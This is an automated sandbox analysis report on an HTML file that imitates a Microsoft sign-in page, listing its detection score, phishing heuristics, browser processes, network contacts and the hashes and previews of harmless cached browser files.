automated malware analysis report for
ID: 150203
Sample Name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
Cookbook: default.jbs
Time: 03:21:16
Date: 09/07/2019
Version: 26.0.0 Aquamarine
Table of Contents
Analysis Report CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
Overview, General Information, Detection, Confidence, Classification, Analysis Advice, Mitre Att&ck Matrix, Signature Overview
Phishing, Networking, System Summary
Behavior Graph, Simulations
Behavior and APIs, Antivirus and Machine Learning Detection
Initial Sample, Dropped Files, Unpacked PE Files, Domains, URLs
Yara Overview, Initial Sample, PCAP (Network Traffic), Dropped Files, Memory Dumps, Unpacked PEs
Joe Sandbox View / Context, IPs, Domains, ASN, JA3 Fingerprints, Dropped Files
Screenshots, Thumbnails
Startup, Created / dropped Files, Domains and IPs
Contacted Domains, URLs from Memory and Binaries, Contacted IPs, Public
Static File Info, General, File Icon
Network Behavior, TCP Packets, UDP Packets, DNS Queries, DNS Answers, HTTPS Packets
Code Manipulations, Statistics
Behavior, System Behavior
Analysis Process: iexplore.exe PID: 4576 Parent PID: 692, General, File Activities, Registry Activities
Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576, General
Copyright Joe Security LLC 2019 Page 2 of 47
File Activities, Registry Activities
Disassembly
Analysis Report CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
Overview
General Information
Joe Sandbox Version: 26.0.0 Aquamarine
Analysis ID: 150203
Start date: 09.07.2019
Start time: 03:21:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis stop reason: Timeout
Detection: SUS
Classification: sus24.phis.winHTML@3/70@11/2
Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .htmlBrowsing link: https://login.microsoftonline.com/common/reprocess?ctx=rqiiaxwro2_tuacfc_mwlscowgdswary4nfiia4hcz2e2a6o3dzeitfx48bp2dee5bewihvg6oiekcompgqe2dtvgglwblqjcxvajkq_govmr5-ozvegrfbj5n2gzlirfsjjvmxromotbg4xfiftlm3rfefowilo7lzfqu--tj7_edr9-epg4olyy6ctcndhkm2btdpisagmrgttp2onue0ughmafgjwxkw4ma6ptoo5r3n1mugoxppg8stl81vju31f1blppsnpakizeormsaub5jhs9cmsrj2stulk7juhfommmtvyrbmxskdhzsepldzbmoiuhozvhvkaoyh7vjqnlszkwmmrtn4r3lzac-rtv5fkcovcfjfdjivgazkj49jbokro3ju0kzh2bfs9qjkxgrafybipsyr1mgsdfkc1u-xeloxandmsgs8yj4lnasferoiqoc8m6p5gisfyzgxmpwt2ypyzltoipzakmjuyfg_dgfve16h2ifbg0l6wtdnz2a_gjs6sndzasqgof0an-mfjxqwent1osky59zx3tpwprfb9cvvfgixxwenwelqmj9tplrgwdm7l4kj8kyg1nzawlxcvsf34wwavk2tbvwz3o2rg4hv--6j06rrwvqk9hkhhbhrnacojwb9iklkppfx1ushz7_azrsapi5xvemoy2wga5begjjdsnwzexct82pyf6381#Browsing link: https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rqiiaxwsvw_tubtf4yqnbufqisqyozcbndw_fyso6fba10mj7edybe0lch1_vpgzzmtd8hewihvgyoiekcompgqe2dtvgqmsdkgseuqaghhzu9zlnvpt1tn3uymqus2hdm2wvn2fj3mlo0mgpwbpmzajazbmaaioaqvo7o7ycn7_bfdlz5pwqx83oxexxz_piav-ia6dqp1ex8r9h-n03kzvjpnjnxfdzp9f1e4i4owgfhlevljgxkteoy6oozqr0wwhgzkz8htl81vju31f1blppmnpacizasbdadbrpeyapsesqenzg0tgrhlkkc4yq4nvnhuibory3pqjzqmau9xcnd2tum4zirjjs8ngasyemrzp1hnxjrj-gh14nzimzzzl4pkbzfe_tcz4xnphkkkttwcbsrw7nq5eyzwyi9vckim7wzi6guboeg19pmrtidwyolmnm17q7wuvaibeihgv0gctducwxwa6mjqjtjxaz7czltpavetfla1zi0dhx33ma3ajxdgwas-y2pks7az9k2spzfwozmfofein5n5txovc2240wnm88dx3nd3owughuiwpnuri09lt_kgydvbtlhfr6jyviyvylvbqli5wvoghhdxc3zlxzifv7pfhfplmshzlf--vxp8uthdqj1hosqgkodydcpyejcn1yfnvn-ts261tpivwymtmn0a3ztayjnvuiy4qld-v4ssbhy9l13v9vnwv_5cgcxgssquab1k5tw7-aw2&estsfed=1&uaid=64d4ac74f6bf483c8de40b4ceaf2d3bd&signup=1&lw=1&fl=easi2
&fci=4345a7b9-9a63-4910-a426-35363201d503&mkt=en-usBrowsing link: https://www.microsoft.com/en-us/servicesagreement/Browsing link: https://privacy.microsoft.com/en-us/privacystatementBrowsing link: file:///c:/users/user/desktop/cusersadminisratordocumentspagesselfsendersharedfile07092019_pdf.html2.html#
Warnings:
Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, CompatTelRunner.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted)
Excluded domains from analysis (whitelisted)
Report size getting too big, too many NtDeviceIoControlFile calls found.
Detection
Strategy Score Range Reporting Whitelisted Detection
Threshold 24 0 - 100 false
Confidence
Strategy Score Range Further Analysis Required? Confidence
Threshold 4 0 - 5 false
Classification
[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.]
Analysis Advice
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis
Mitre Att&ck Matrix
Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise
Execution: Windows Remote Management; Service Execution; Windows Management Instrumentation
Persistence: Winlogon Helper DLL; Port Monitors; Accessibility Features
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception
Defense Evasion: File System Logical Offsets; Binary Padding; Rootkit
Credential Access: Credential Dumping; Network Sniffing; Input Capture
Discovery: File and Directory Discovery 1; Application Window Discovery; Query Registry
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Data Encrypted 1; Exfiltration Over Other Network Medium; Automated Exfiltration
Command and Control: Standard Cryptographic Protocol 2; Standard Non-Application Layer Protocol 2; Standard Application Layer Protocol 2
Signature Overview
• Phishing
• Networking
• System Summary
Phishing:
Phishing site detected (based on favicon image match)
Found iframes
HTML body contains low number of good links
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)
Submit button contains javascript call
Suspicious form URL found
META author tag missing
META copyright tag missing
Networking:
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Found strings which match to known social media urls
Performs DNS lookups
Urls found in memory or binary data
Uses HTTPS
System Summary:
Classification label
Creates files inside the user directory
Creates temporary files
Reads ini files
Spawns processes
Found graphical window changes (likely an installer)
Uses new MSVCR Dlls
Behavior Graph
ID: 150203
Sample: CUsersadminisratorDocuments...
Startdate: 09/07/2019
Architecture: WINDOWS
Score: 24
[Behavior graph. Nodes shown:]
secure.aadcdn.microsoftonline-p.com
Phishing site detected (based on favicon image match)
iexplore.exe, 6 84, started
iexplore.exe, 104, started
aa-hip-prod.southcentralus.cloudapp.azure.com, 104.215.74.84, 443, 49733, 49734, unknown, United States
cs1227.wpc.alphacdn.net, 192.229.221.185, 443, 49725, 49726, unknown, United States
13 other IPs or domains
Simulations
Behavior and APIs
No simulations
Antivirus and Machine Learning Detection
Initial Sample
Source Detection Scanner Label Link
CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html 6% virustotal Browse
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
Source Detection Scanner Label Link
https://login.microsof/Desktop/CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html 0% Avira URL Cloud safe
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.core.min_2y6puv-fhesw6oymb- 0% Avira URL Cloud safe
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_xqvbwocyraoe 0% Avira URL Cloud safe
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Memory Dumps
No yara matches
Unpacked PEs
No yara matches
Joe Sandbox View / Context
IPs
Match Associated Sample Name / URL SHA 256 Detection Link Context
Domains
Match Associated Sample Name / URL SHA 256 Detection Link Context
ASN
Match Associated Sample Name / URL SHA 256 Detection Link Context
JA3 Fingerprints
Match Associated Sample Name / URL SHA 256 Detection Link Context
Dropped Files
No context
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Startup
System is w10x64
iexplore.exe (PID: 4576 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
cleanup
Created / dropped Files
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6B3F30D4-A233-11E9-AADA-C25F135D3C65}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Size (bytes): 33368
Entropy (8bit): 1.8703255075059053
Encrypted: false
MD5: 43DA58C7C3881105E3BC3BFAB5B2C624
SHA1: 2E15BB7A248FE3CA5CAC42BC5101F213E8EB7859
SHA-256: 5494620DF4A1B519CA7464D76F85AEE5184CBF3F11E1C4AD2B41166299621F84
SHA-512: 2CD96BC4688AC4ED567213F1A3FE976A0957F6C216296D6BA226C46F0613DA8D5BC2359D37307FCCC411D538D8041B3BE2ADE200B72B8F865F283ABF441A53C2
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Size (bytes): 145638
Entropy (8bit): 3.31748929203143
Encrypted: false
MD5: 4D7CCC39C9B6C66E5EA0CA135271B236
SHA1: B9F25CC4339267086213C300302F85BF3C8DFC8A
SHA-256: E912519979650273645805E9CA60866A2DD6A77099CE4D0F1E6AD56ABA363CD0
SHA-512: 61BE585910487D5E2CF545C4DC42533AD53518BBA09091987414C78062733BF9965B65C7F3F01DF1BC253F92B3796A638363B682C565E9FAF8EEA9B496C90E0E
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{73B3FC37-A233-11E9-AADA-C25F135D3C65}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Size (bytes): 16984
Entropy (8bit): 1.5651325608710502
Encrypted: false
MD5: 507D396B22049D5BBE378C29A8E39748
SHA1: E0F898EFD82D39D9DB9936111C1254472625B3A9
SHA-256: 1CA37CF399CD8767708D6D2CF75C4B00E7AB9ED5DF93C2DF06FB2AFDD6D2C8BA
SHA-512: 3A0CB60D89AA66A24D2F1EEF52C2E11961578FF0A392469F5DE4408052CE2F06D9719E5ABF1D60075FF5ACBD8E82361579CA8ED06F6E803BCAFAEB92E4A9C9D3
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 656
Entropy (8bit): 5.092233081919978
Encrypted: false
MD5: F4274E75BC32AACB92BECB9B76F184B8
SHA1: 3F511E721E9C0E483F83E9ED214ED9A32DD826BB
SHA-256: 534162358D123C4CED1C0DCD6C53ED77B63C9433FCAD829AE2CB3FBBECFAB9F7
SHA-512: E91E40E8171F3105EAA3FD587E1530534E59573AD5174AC9ABCDC8111052BBAA595E9853B23FDF92E8B008D35139185BF20E8F7F94FE43EE6EFD2A909134B8E2
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x41ffd10d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x42027f75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 653
Entropy (8bit): 5.1183826834578765
Encrypted: false
MD5: 2C8906B52317C5877F7B4CD2EF6C45BD
SHA1: 88CB1EF93B12075D151DE8801E021A5F5D264B86
SHA-256: D1505E0F23D3E3811FF22FFD5128C88D3356D34053265A3E5BD62EB5767B093E
SHA-512: BC87F02926B97A7894E8C6AE292C2A5014807843D5B6407FE1D28B34BE99A3F3778C0C19B8D9B3F55CAECF92C1612ED4AAAEC02BDED5CB040CB210F332B4E982
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41c1ad24,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41d57ed0,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 662
Entropy (8bit): 5.131340823983181
Encrypted: false
MD5: FAB148AC9F777CB82C1F2103AC509090
SHA1: 562ED02F68D604D153150A226DCD1DCCCA46554D
SHA-256: 26B18FDDDAA96EC66B709B528E0869D9141CC9BDA3072C73F213F6DED945FE9F
SHA-512: 3883F75C7FCEB4385B4093AF71E8FEE650B5CA45D499B975059D186E4AF293F4095FA16B02B8DB2AA6BE726BD3F76DEDA8591785D2DC9B529A6C038D770E53F1
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x42050801,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x420791db,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 647
Entropy (8bit): 5.115930101420065
Encrypted: false
MD5: 8B7BA4E727F8ACB8DB64EBF5FB230D25
SHA1: 16A8DF42F8A7FF577C9DFB56A77B1429EB086665
SHA-256: A8850950E052CD17673333599F098320C4D8EEB1136075DA8F88F1683AB643F8
SHA-512: 7C6F139B28A79E7DCB7CDE2BB34B157C0D0BFC6D526AB2C42FF0587694023F17E68603F6F0E3BC7030D191DC7B43ACFE341C20E490126AF011FAF1AEC64D3645
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f35f81,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f5d4eb,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 656
Entropy (8bit): 5.138443843506685
Encrypted: false
MD5: 4EF2A145D595A6E77BEAAF52BD2FDA7F
SHA1: B7E09DD6CFC440AB67880838928013D6CC30A850
SHA-256: 765CC8F692DA19011048F1EDF07A1B75BADF8A02082229E946B54EDBD785BFD6
SHA-512: 2C78ADFD8074C22D8900F00F46460CAAFAA1EED4BB4F29C5C55AAB14ABA4599A11C53ECCB6E20D5C3B43966D183904B47FDE6C85CF9EE20CE94653CD917C0707
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420cb48e,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420f3dc7,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 653
Entropy (8bit): 5.080045270510188
Encrypted: false
MD5: 88632604F69B57E1882790DE6F5CFF7D
SHA1: E2EE8473409C5BD10C670A5EB0483C6BFD0949F3
SHA-256: E34369A12DA43B38E25C838A0865B884120F2B477B71BCA9777DDBCAF403E8ED
SHA-512: C0AE8E7BBE9806200E59D787D777B4C220E5C633E2185FD6CCD43953290E492EC3682A3462421AFA6357ED9426423F44AD07D0E3CAD189EE15C481DAEBBDD9EF
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41fd34f6,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 656
Entropy (8bit): 5.135533928686235
Encrypted: false
MD5: A02B5C2FFC9C50B512240E57C5146E4F
SHA1: 4BB63FDD58AA53851F95AD1DABF0F5B80452D3E9
SHA-256: 598BEB24024D238606506018EF51F26E86FF469EB1D576C26188F8C02302A1A0
SHA-512: 09C2B95C64860C96B3F9576ECBCA20352C3CAD8F5C15BDD73DB55E4C2AB8DFF224BA56733BE86B2638B732036AD8ADC3C4D7174E189AC27549181923464600F9
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41f84a1b,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 659
Entropy (8bit): 5.104813826095068
Encrypted: false
MD5: 18ADDFA8D7F62F04B4EB84C3A6271BBB
SHA1: 9544908050FEEAA9C7F3201DFD85C12BB11012D6
SHA-256: 421F93153E9B85D8FAD84927D3D0F8E349A4EE01BAC0DC2C95EA5F59E13DC922
SHA-512: AE72741B66FC9C288E4B6767E532FF28B3425401D7732FE87F2D95CF90D74E2933F4E6AAB91CC73DFD521B574D6A1A778DDF8160A1378400A1B8B8554D96D8EE
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e17dd5,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e4063d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 653
Entropy (8bit): 5.090773860921899
Encrypted: false
MD5: 82E65BDA761DB053CD7F5C2538B5D11F
SHA1: 0AEC3A18249F409B25F54553FB091AEECC6370D2
SHA-256: 34174AED141A4AE936CDDEC28DBD5AD06813680642E66D796CCE3B804BF17BAA
SHA-512: E57994CD8D7B343AA7CB9137E927AEFE78DAD17E334208BB869002F6832E2CA7A7F4A0247CD767F1927A99E7DBE5C7AE82CE9A1FD9F08F746F107736B45784E1
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ebd910,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ee4e75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\6aw4uvh\imagestore.dat
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 72284
Entropy (8bit): 3.0775400929565304
Encrypted: false
MD5: 0955EFE2855D2095B6429167AFFB0A5C
SHA1: 7BE788245F2FAFD22DB1165B3D9BAFDF0D51509E
SHA-256: 2137D1B12AE9618FEF47E861B2D0B3D7D464BB6C1B1DCE8AF7E84C184F2F40A5
SHA-512: E3083BF3B70950CD43AC86D9098F8F0302AC7DF2F6A29BFAD183CEF3B0F6DB1FE3EB05E5F32380037C9C859A2A71EA858590A204CA1A308683D07F40D865DB71
Malicious: false
Reputation: low
Preview: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico (followed by binary icon data)
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\NewErrorPageTemplate[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1612
Entropy (8bit): 4.869554560514657
Encrypted: false
MD5: DFEABDE84792228093A5A270352395B6
SHA1: E41258C9576721025926326F76063C2305586F76
SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious: false
Reputation: high, very likely benign file
Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\app[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Size (bytes): 344831
Entropy (8bit): 5.052152993582276
Encrypted: false
MD5: 677E66D9B62C449D01191132B1125AE3
SHA1: A6A31BC3B401638C95C5B587D5AC8D44627C0611
SHA-256: AC1E130CBDEC824CFB8EE8FFC2CC3218365FBA0B0C23D5DAC7A8B038C1176F46
SHA-512: 77B708FA7F8E3E262B43D6978079C4E930FFD9693B05314491155856CA9A65C0622108AA468ED86B8E18AE1CD67A1CB0755B62DEE39E8D1DD53D3D6C3856DF6B
Malicious: false
Reputation: low
Preview: @font-face {. font-family: "wf_segoe-ui_normal";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");. font-weight: normal;. font-style: normal; }..@font-face {. font-family: "wf_segoe-ui_light";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.ttf") format("truetype
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\arrow_px_up[1].gif
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: GIF image data, version 89a, 7 x 9
Size (bytes): 1305
Entropy (8bit): 3.799575332787369
Encrypted: false
MD5: BA32C65F44781F977BBB0B9F57413F48
SHA1: 3618723B0494B92619CE342EE7174EBAEFCD90D9
SHA-256: 3C3E5B3BFFB0A6122D4AD5818C7B609856B9CDC1527C7E19F8E4B042D30723E6
SHA-512: 13A1EC1F9F1651754E7494600C070D3560177B22A278652FEA9EBAC7EC71DD43A016D66CE83902A2B600DBF48F4CDD98D901F46B06084E1F20CD95AB8CED2B9D
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1678
Entropy (8bit): 4.566317707595381
Encrypted: false
MD5: 7E81A79F38695E467A49EE41DD24146D
SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316
SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536
